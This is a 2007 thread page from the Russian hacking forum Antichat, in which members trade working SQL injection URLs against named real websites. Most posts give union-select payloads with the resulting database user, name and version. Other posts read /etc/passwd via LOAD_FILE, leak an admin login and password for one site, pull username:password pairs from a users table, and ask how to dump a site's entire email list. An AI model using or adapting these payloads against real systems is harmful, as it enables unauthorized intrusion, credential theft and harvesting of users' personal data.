ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2401  
Старый 04.06.2007, 15:47
Аватар для Пчел
Пчел
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698

Репутация: 20
По умолчанию

Магазин велосипедов

Код:
http://www.velo-mag.ru/index.php?action=page&id=-12345+union+select+1,2,3,4,5,6,7,8/*
USER: assortif_velo@localhost
DATABASE: assortif_velo
VERSION: 5.0.24a

18 таблиц: stella_pages, stella_news, fb_pages, VIEWS, USER_PRIVILEGES, TRIGGERS, TABLE_PRIVILEGES, TABLE_CONSTRAINTS, TABLES,
STATISTICS, SCHEMA_PRIVILEGES, SCHEMATA, ROUTINES, KEY_COLUMN_USAGE, COLUMN_PRIVILEGES, COLUMNS, COLLATION_CHARACTER_SET_APPLICABILITY, COLLATIONS, CHARACTER_SETS.


Код:
http://www.ik-ki.nl/?id=14&subid=30&action=bekijk&nieuws=-12345+union+select+1,2,3,4/*
USER: ikki_ikki@localhost
DATABASE: ikki_db
VERSION: 4.1.22


Код:
http://www.icppc.pl/pl/index.php?id=-12345+union+select+1,2,3/*
После запроса появляются еще ошибки, поэтому чуть не упустил из виду, что отображается 3 поле.

USER: icppc_jakub@localhost
DATABASE: icppc_jakub
VERSION: 4.1.21-standard-log
 
Ответить с цитированием

  #2402  
Старый 04.06.2007, 17:15
Аватар для x.Elf
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

www.e1.ru:
/etc/passwd/
http://www.e1.ru/business/conference/yarmarka/read.php?theme=-1&question=-1'+union+select+1,2,3,4,LOAD_FILE(CHAR(47,101,116, 99,47,112,97,115,115,119,100))/*
www.sermet.ru:
http://www.sermet.ru/index.php?idpage=2&idnews=-1+union+select+1,2,3,4,5+from+users/*
admin:admin
pass:140108
 
Ответить с цитированием

  #2403  
Старый 04.06.2007, 18:36
Аватар для x.Elf
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

www.uph.ru:
http://www.uph.ru/inner.php?page=reklama1&top=-1+union+select+1,2/*
www.rns-soft.ru:
http://www.rns-soft.ru/?action=projects&id=-1+union+select+1,2,3,4+from+news/*
 
Ответить с цитированием

  #2404  
Старый 04.06.2007, 21:09
Аватар для dudits
dudits
Banned
Регистрация: 02.06.2007
Сообщений: 42
Провел на форуме:
263861

Репутация: 6
По умолчанию

привет., у меня такая проблема, я пока в скьюэл не очень, поэтому не могу понять как получить доступ к базе мыл сайта:
ну есть сайт допустим сайт www.xxxxx.com с бажным скриптом, в строке URL ввожу :. www.xxxxx.com/index.php?l=2&id=-1+union+select+1,aes_decrypt(aes_encrypt(email,0x7 1),0x71)+from+users+limit+40000,1/*&s=3 вот ето, но он выдает ток по 1 мылу, в зависимости от того что ввел перед
,1/*&s=3. Например ввожу перед ,1/*&s=3 число 10000 выдает одно мыло , ввожу перед ,1/*&s=3 число 40000 выдает другое, и тд, но по 1, а как сделать чтоб всю базу просмотреть? или выкачать, может что то добавить к етому коду?
 
Ответить с цитированием

  #2405  
Старый 04.06.2007, 21:29
Аватар для Пчел
Пчел
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698

Репутация: 20
По умолчанию

Код:
http://www.bayraktaremlakinsaat.com/index.php?detay=detaylar&x=&id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2   4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
USER: bayrakta_admin@localhost
DATABASE: bayrakta_emlakdb
VERSION: 4.1.21-standard




Код:
http://www.ta.fi/kohde_aso/?id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
USER: webigurut@localhost
DATABASE: kampat
VERSION: 4.1.21-log
 
Ответить с цитированием

  #2406  
Старый 04.06.2007, 21:56
Аватар для x.Elf
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

Цитата:
Сообщение от dudits  
привет., у меня такая проблема, я пока в скьюэл не очень, поэтому не могу понять как получить доступ к базе мыл сайта:
ну есть сайт допустим сайт www.xxxxx.com с бажным скриптом, в строке URL ввожу :. www.xxxxx.com/index.php?l=2&id=-1+union+select+1,aes_decrypt(aes_encrypt(email,0x7 1),0x71)+from+users+limit+40000,1/*&s=3 вот ето, но он выдает ток по 1 мылу, в зависимости от того что ввел перед
,1/*&s=3. Например ввожу перед ,1/*&s=3 число 10000 выдает одно мыло , ввожу перед ,1/*&s=3 число 40000 выдает другое, и тд, но по 1, а как сделать чтоб всю базу просмотреть? или выкачать, может что то добавить к етому коду?
кинь линк...на сайт...
 
Ответить с цитированием

  #2407  
Старый 05.06.2007, 07:47
Аватар для loc
loc
Новичок
Регистрация: 01.06.2007
Сообщений: 7
Провел на форуме:
82944

Репутация: 0
Отправить сообщение для loc с помощью ICQ
Exclamation

Цитата:
Сообщение от l1ght  
интересная скуля*
в качастве пароля подойдет:
Код:
' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Что-то не получается.(( Может что не то делаю?
 
Ответить с цитированием

  #2408  
Старый 05.06.2007, 09:14
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Код:
http://www.cdrlabs.com/articles/index.php?articleid=-3+union+select+concat_ws(0x3a,username,password)+from+users+limit+1,1
__________________
..
 
Ответить с цитированием

  #2409  
Старый 05.06.2007, 09:44
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Цитата:
Сообщение от loc  
Что-то не получается.(( Может что не то делаю?
http://forum.antichat.ru/thread41560.html
 
Ответить с цитированием

  #2410  
Старый 05.06.2007, 13:53
Аватар для alextoun
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://yellowpages.rin.ru/cgi-bin/more.cgi?z=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
ух ты ошибка.
мда

Цитата:
http://www.render.ru/gallery/?gal_rub=-1+union+select+1,2/*
а здесь ваще пусто пошло))

Последний раз редактировалось alextoun; 05.06.2007 в 13:55..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ